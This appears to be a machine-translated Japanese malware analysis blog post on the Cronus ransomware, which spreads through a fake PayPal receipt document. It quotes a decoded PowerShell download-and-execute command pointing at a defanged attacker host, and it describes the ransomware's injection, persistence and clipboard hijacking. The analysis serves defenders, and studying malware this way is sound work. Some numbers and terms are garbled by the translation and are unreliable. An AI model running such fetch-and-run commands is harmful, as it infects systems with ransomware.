Seqrite Labs APT-Teamは最近、偽のPayPalアカウントを利用した複数の攻撃キャンペーンを発見しました。これらのキャンペーンは、Cronusと呼ばれる新しい亜種のランサムウェアを用いて、世界中の個人を標的にしています。このマルウェアはPowerShellで開発され、ディスクに悪意のあるコンテンツを書き込むことなく、メモリ上で直接実行されます。
このブログでは、テレメトリ分析中に発見したキャンペーンの巧妙さと技術的な詳細について考察します。まず、最初のドキュメントペイロードから始まり、キャンペーンの各段階を検証します。次に、悪意のあるVBAスクリプトを抽出・分析し、最後に、 PowerShellペイロード 反射型 DLL 読み込みを使用してランサムウェアを実行します。
初期の調査結果
14年2024月XNUMX日、私たちのチームは悪意のある文書を発見しました。 VirusTotalの悪意のある埋め込み VBA マクロを含むファイルに対して使用するハンティング ルールに応じて異なります。
最初の分析で、悪意のあるルアーは、次のような単なる領収書文書を模倣することを目的としていることがわかりました。 paypal_charges.doc。 その後、悪意のあるストリームから悪意のあるマクロを抽出したところ、悪意のあるVBAがPowerShellベースのローダーである第2ステージをダウンロードしていることがわかりました。 8eef4df388f2217caec3dc26.ps1反射読み込み技術を使用してランサムウェアベースの DLL を読み込みました。
NETWALKER などの多くのランサムウェアグループは、これまでにもこの手法を使用してランサムウェアを展開してきました。
感染連鎖
テクニカル分析
分析を 3 つの異なる部分に分けて説明します。
初期感染 – 悪意のある文書
当初、最初の感染は悪意のあるWord文書によって引き起こされ、主にフィッシング攻撃によって拡散したことがわかりました。そのため、悪意のあるマクロのストリームを調査する前に、ルアーの内容を詳細に調査することにしました。
ルアーが単なる空白のWord文書であることから、この文書ファイルは脅威アクターの成熟度を物語っています。そこで私たちは、この悪意ある文書の悪意ある流れを深く掘り下げ、さらなる分析のために迅速に抽出することにしました。
埋め込まれたマクロの仕組みを解明したところ、不要なコメントや変数名によって高度に難読化されており、分析が困難になっていることがわかりました。そこで、VBAマクロの難読化を解除することにしました。これは以下のような形式です。
//デコードされた Base64 コマンド。
IEX (New-Object Net.WebClient).DownloadString(‘hxxps[:]//eternal[.]lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26[.]jpg’);
マクロはpowershell.exeを使用して、Base64エンコードされた文字列を引数として実行していたことは明らかでした。内容をデコードすると、第XNUMX段階のペイロードをサーバーからダウンロードしようとしていたことが判明しました。
第2段階 – 悪意のあるPowerShellローダー
ファイルの拡張子は.JPEGですが、ファイルタイプはPowerShellファイルであることが分かりました。そこで、悪意のあるPowerShellローダーをすぐに調べることにしました。
予想通り、第2段階はジャンクコードで巧妙に難読化されており、分析を困難にしています。そこで、ジャンクコードを削除し、分析を困難にするために使用されているジャンクコードのパターンを観察することで、PowerShellスクリプトの難読化を手動で解除することにしました。
このスクリプトは、次のような一連のシーケンスを含む 3 層のジャンク コードを使用して難読化されています。
if ($a.ProcessName -like “junkcodesequenceone”){
…ここにジャンクコードがあります…
…ここにジャンクコードがあります…
…ここにジャンクコードがあります…
}
if ($a.ProcessName -like “junkcodesequencetwo”){
…ここにジャンクコードがあります…
…ここにジャンクコードがあります…
…ここにジャンクコードがあります…
}
..実際の PowerShell スクリプト…
if ($a.ProcessName -like “junkcodesequencethree”){
…ここにジャンクコードがあります…
…ここにジャンクコードがあります…
…ここにジャンクコードがあります…
}
実際のPowerShellコードを見ると、ファイルには2バイトの配列が含まれていることがわかります。 含む .NETアセンブリは、リフレクションロードを使用してメモリにパックされます。最終段階は、悪意のある.NETアセンブリです。 含む ランサムウェア。
最終段階 – 悪意のある.NETアセンブリ
第二段階で抽出した悪意のある.NETアセンブリを検証してみましょう。抽出後、DLLをDetect-It-Easy (DIE) ツールに読み込み、パックまたは保護された.NETアセンブリファイルを特定しました。
最初の.NETアセンブリは.NET Reactorを使用して保護されていたため、 開梱する it と探る アセンブリファイル さらに dnスパイ 以下のためのツール a 詳細なコード概要。
最初のDLLファイルTEStxx.dllを解凍すると、読み込まれたアセンブリが 責任があります プロセスインジェクションを実行します。この場合、2番目の実行ファイルであるRegSvcs.exeがプロセスのメモリに挿入されます。そこで、 調べる 2 番目の悪意のある .NET 実行ファイル。
この最終的な実行ファイルのメインメソッドを調べると、壁紙の変更など、ランサムウェアベースの動作に関連するさまざまなタスクを実行していることがわかります。 列挙する 特定のファイルを暗号化し、 終了中 実行中のプロセス。
さらに、次のような方法もあります。 トリプル暗号化, 完全暗号化 and 再帰ディレクトリルック, 例外ファイル 興味深い点が数多くあります。そこで、このランサムウェアの興味深い機能をいくつか調査してみましょう。
セルフコピー
ランサムウェアのバイナリは自身をコピーし、 C:\ユーザー\ \AppData\ローカル パスを指定し、バイナリが既に存在する場合、またはコピーされている場合は、自身を削除します。コピーが完了すると、プロセスを開始します。
列挙
ランサムウェアは、まずローカルディスクドライブを列挙し、次にドライブ内のファイルを列挙します。また、特定のフォルダもチェックします。 \システム\ ディレクトリを検索し、それらを除外します。その後、再帰的なディレクトリ検索のための新しいタスクを作成します。
暗号化の対象は特定のファイルタイプであり、以下に示すとおりです。
| .myd | .ndf | .qry | .sdb | .sdf | .tmd | の。tgz |
| .lzo | 。TXT | 。ジャー | .DAT | 。接触 | 。設定 | .DOC |
| 。のdocx | 。XLS | 。XLSX | .pptの | 。PPTX | .odt | jpgの |
| .mka | .mhtml | .oqy | 。PNG | この.csv | .py | .sql |
| .indd | .cs | .mp3 | .mp4 | .dwg | .zip | .rarを |
| 。楽章 | 。RTF形式 | .BMP | mkvの | 。AVI | 。APK | 。リンク |
| .dib | .DIC | .diff | .mdb | 。PHPの | 。のAsp | の。aspx |
| .htmlを | 。HTM | 。のXml | .psd | PDFファイル | .xla | 。カブ |
| .dae | .divx | 。磯 | .7zip | .pdb | 。イコー | .pas |
| .db | .WMV | .swf | .cer | .BAK | 。バックアップ | .accdb |
| .ベイ | .p7c | .exif | .vss | た.raw | 。M4a | 。WMA |
| 。エース | .arj | 。Bz2 | 。キャブ | .gzip | .lzh | 。タール |
| .JPEG | .xz | 。たMpeg | トレント | 。mpgファイル | 。コア | FLV |
| 。うん | 。和 | .ibank | 。財布 | .css | 。Jsの | .rb |
| .crt | .xlsm | .xlsb | 。7z | .cpp | .Java | .jpe |
| 。初期 | .blob | .wps | .docm | wavファイル | .3gp | .GIF |
| .logに | .gz | .config | .vb | .m1v | .sln | 。PST |
| .OBJ | .xlam | .djvu | .inc | .cvs | .DBF | .tbi |
| .wpd | 。ドット | .dotx | .webm | .m4v | .amv | .m4p |
| .svg | .ods | .bk | .vdi | .vmdk | .onepkg | .accde |
| .jsp | .json | .xltx | .vsdx | .uxdc | .udl | .3ds |
| .3fr | .3g2 | .accda | .accdc | .accdw | .adp | .ai |
| .ai3 | .ai4 | .ai5 | .ai6 | .ai7 | .ai8 | .arw |
| .ascx | .asm | .asmx | .avs | .bin | .cfm | .dbxの |
| .dcm | .dcr | .pict | .rgbe | .dwt | .f4v | .exr |
| .kwm | .Max | .mda | .mde | .mdfファイル | .mdw | .mht |
| .mpv | .メッセージ | .myi | .nef | .odc | .geo | 。迅速 |
| .odm | .odp | .oft | .orf | .PFX | .p12 | .pl |
| .pls | 。安全な | 。タブ | .vbs | .xlk | .xlm | .xlt |
| .xltm | .svgz | .slk | .tar.gz | .dmg | .ps | .psb |
| .tif | .rss | .KEY | .vob | .epsp | .dc3 | .iff |
| .opt | .onetoc2 | .nrw | .pptm | .potx | .potm | .POT |
| .xlw | .xps | .xsd | .xsf | .xsl | .kmz | .accdr |
| .stm | .accdt | .ppam | .pps | .ppsm | .1cd | .p7b |
| .wdb | .sqlite | .sqlite3 | .dacpac | .zipx | .lzma | .z |
| .tar.xz | .pam | .r3d | .ova | .1c | .dt | .c |
| .vmx | .xhtml | .ckp | .db3 | .dbc | .dbs | .dbt |
| .dbv | .frm | .mwb | .mrg | .txz | .vbox | .wmf |
| 。ヴィム | .xtp2 | .xsn | .xslt |
Encryption
ランサムウェアのバイナリは、ファイルサイズに応じて512種類の暗号化方式を使用します。512KB未満のファイルの場合、FULL_ENCRYPT方式でファイルを一括暗号化します。XNUMXKBを超えるファイルの場合、TRIPLE_ENCRYPT方式でファイルの内容を複数の部分に分割して暗号化します。どちらの方式も、ファイルの暗号化にはAES暗号化方式を使用します。
小さなEXCEPTIONAL_FILEが追加され、上記のファイルが除外され暗号化されます。暗号化の実行中に、ランサムウェアのメモと、 cronus.txt。
プロセスの終了
ランサムウェアバイナリは、実行中のすべてのプロセスを列挙した後、メインウィンドウを終了させることで、多くのプロセスを終了させます。終了されるプロセスのリストは次のとおりです。
| SQLライター | sqbcoreサービス | バーチャルボックスVM | SQLエージェント | SQLブラウザ | sqlserver | コード |
| スチーム | ズールズ | エージェント | Firefoxの設定 | インフォパス | 同期時間 | VBoxSVC |
| tbirdconfig | バット | ザバット64 | isqlplussvc | マイデスクトップサービス | mysqldを | ocssd |
| OneNoteの | mspub | マイデスクトップQoS | CNTAoSMgr | Ntrtscan | vmplayer | オラクル |
| 見通し | POWERPNT | WPS | xfssvcコン | プロセスハッカー | デベン50 | dbsnmp |
| encsvc | エクセル | 聞く | PccNTMon | mysqld-nt | mysqld-opt | ocautoupds |
| 通信 | MSACCESS | msftesql | サンダーバード | Visioの | WINWORD | ワードパッド |
| mbamtray |
上記のすべてのプロセスが正常に終了したら、再度 すべてのドライブ 特定のファイルをさらに列挙して暗号化するメソッドです。
固執
ランサムウェアバイナリは有名な ランキーズ 永続性のために、新しいキーを追加します クロノス 上記のレジストリハイブにバイナリを実行する RegSvcs.exe 始めるとき。
データ操作
ランサムウェアはクリップボードの内容を列挙します。クリップボードにビットコインアドレスが見つかった場合、それを脅威アクターのBTCウォレットのアドレスに置き換え、身代金を搾取します。
身代金要求書にはBTCウォレットのアドレスが記載されており、, に 調査、方向転換 に 空になる.
コードの重複
別のマルウェア サンプル コーパスを調査および調査した結果、このキャンペーンで使用された DLL インジェクターである PowerShell ローダーに存在するコードは、次のように他のアクティブなファイルレス マルウェア キャンペーンと重複していることがわかりました。
- リベンジRAT
- アローラット
- 非同期RAT
- アンドロメダRAT
- エックスワーム
- nRAT
結論
ファイルレスマルウェアの亜種であるCronusランサムウェアは、非常に新しく、活発に拡散していることが判明しました。上記の手口は現在、様々な標的マシンにランサムウェアを感染させる際に主に利用されています。
Seqrite 保護性能
- SCRIPT.Cronus.48939.GC
- OLE.クロノス.48940.GC
- ランサム.クロノス
- トロイの木馬インジェクター
IOC
| ハッシュ[SHA-256] | ファイル名 |
| 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3 | paypal_charges.doc |
| 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb | paypal_charges.doc |
| afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987 | ~WRL003.tmp |
| 629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53 | 8eef4df388f2217caec3dc26.ps1
|
| dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3 | TEStxx.dll |
| 42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad | p000.exe
|
| URLは |
| hxxps://eternal[.]lol/file/ |
MITER ATT&CK
| 戦略 | テクニックID | 名前 |
| 初期アクセス | T1566.001 | フィッシング:スピアフィッシング添付ファイル |
| 実行 | T1204.002
T1059.001 T1059.005 |
ユーザーの実行:悪意のあるファイル
コマンドおよびスクリプト インタープリター: PowerShell コマンドおよびスクリプトインタープリター:Visual Basic |
| 固執 | T1547.001 | レジストリ実行キー / スタートアップ フォルダー |
| 防衛回避 | T1027.010 T1620 T1055.012 |
コマンド難読化 リフレクションコードの読み込み プロセス空洞化 |
| プーケットの魅力 | T1057 T1083 |
プロセスディスカバリー ファイルとディレクトリの検出 |
| 影響 | T1486 T1491.001 T1565.002 |
影響を考慮してデータが暗号化されています。 改ざん:内部の改ざん データ操作:送信データ操作 |
協力者
- スバジート・シンハ
- サトウィック・ラム・プラッキ
